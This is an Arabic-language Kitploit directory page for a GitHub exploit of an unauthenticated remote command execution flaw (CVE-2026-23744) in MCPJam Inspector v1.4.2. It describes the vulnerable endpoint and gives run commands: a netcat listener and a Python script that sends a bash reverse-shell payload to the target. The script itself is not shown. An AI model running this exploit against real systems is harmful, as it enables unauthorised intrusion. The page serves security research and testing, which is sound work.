Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-23744-RCE — تم إنشاء هذه الأداة أثناء بحث يتضمن MCPJam v1.4.2. يعرض التطبيق نقطة نهاية API تقبل كائن تكوين الخادم. في ظل ظروف معينة، قد يؤدي عدم كفاية التحقق إلى تنفيذ أوامر غير مقصودة. | Kitploit
أدوات/GitHubGitHub/alisster00/cve-2026-23744-rce
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمأداة الوصول عن بعد
GitHubalisster00/cve-2026-23744-rce

CVE-2026-23744-RCE

تم إنشاء هذه الأداة أثناء بحث يتضمن MCPJam v1.4.2. يعرض التطبيق نقطة نهاية API تقبل كائن تكوين الخادم. في ظل ظروف معينة، قد يؤدي عدم كفاية التحقق إلى تنفيذ أوامر غير مقصودة.

عرض المستودع
111منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

MCPJam Inspector v1.4.2 - استغلال تنفيذ الأوامر عن بعد (RCE)

وصف الثغرة

يحتوي MCPJam Inspector على ثغرة تنفيذ أوامر عن بعد (RCE) بدون مصادقة في نقطة النهاية /api/mcp/connect. تسمح الثغرة للمهاجمين بتنفيذ أوامر عشوائية عن طريق إرسال حمولة ضارة لتكوين خادم MCP.

تقبل نقطة النهاية حمولة JSON تحتوي على كائن serverConfig يحتوي على مصفوفة command و args، والتي يتم تنفيذها مباشرة على النظام دون تحقق أو تعقيم مناسب.

الإصدارات المتأثرة

  • MCPJam Inspector الإصدار 1.4.2 والإصدارات السابقة المحتملة

الاستخدام

المتطلبات الأساسية

  • بايثون 3.6+
  • مكتبة requests: pip install requests
  • netcat أو socat للمستمع

بداية سريعة

المحطة 1 - تشغيل المستمع:

nc -lvnp 4444

المحطة 2 - تشغيل الاستغلال:

python3 script.py <TARGET_IP> -l <YOUR_IP> --lport 4444

أمثلة

# الوضع الافتراضي (المنفذ 6274، منفذ الاتصال 4444)
python3 script.py <TARGET_IP> -l <YOUR_IP>

# منفذ MCPJam مخصص
python3 script.py <TARGET_IP> -p 6274 -l <YOUR_IP>

# منفذ مستمع مخصص
python3 script.py <TARGET_IP> -l <YOUR_IP> --lport 5555

كيف يعمل

  1. يتحقق السكريبت من أن MCPJam قابل للوصول على الهدف
  2. يبني حمولة خادم MCP خبيثة مع شل عكسي bash
  3. يرسل الحمولة إلى نقطة النهاية /api/mcp/connect
  4. يعالج MCPJam الأمر ويبدأ اتصال الشل العكسي
  5. يتلقى المستخدم شل تفاعلي على المستمع

إخلاء مسؤولية

⚠️ إخلاء المسؤولية:

يتم توفير هذا الاستغلال للأغراض التعليمية واختبار الأمان المصرح به فقط. الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني. المستخدمون مسؤولون وحدهم عن:

  • الحصول على التصريح المناسب قبل اختبار أي أنظمة
  • الامتثال لجميع القوانين واللوائح المعمول بها
  • أي أضرار أو عواقب قانونية ناتجة عن سوء الاستخدام

لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام أو الأضرار الناجمة عن هذه الأداة. استخدم على مسؤوليتك الخاصة.

التفاصيل التقنية

المكونالقيمة
نقطة النهاية الضعيفة/api/mcp/connect
الطريقةPOST
المصادقةغير مطلوبة
التأثيرتنفيذ أوامر عن بعد بدون مصادقة
تنزيل الأداة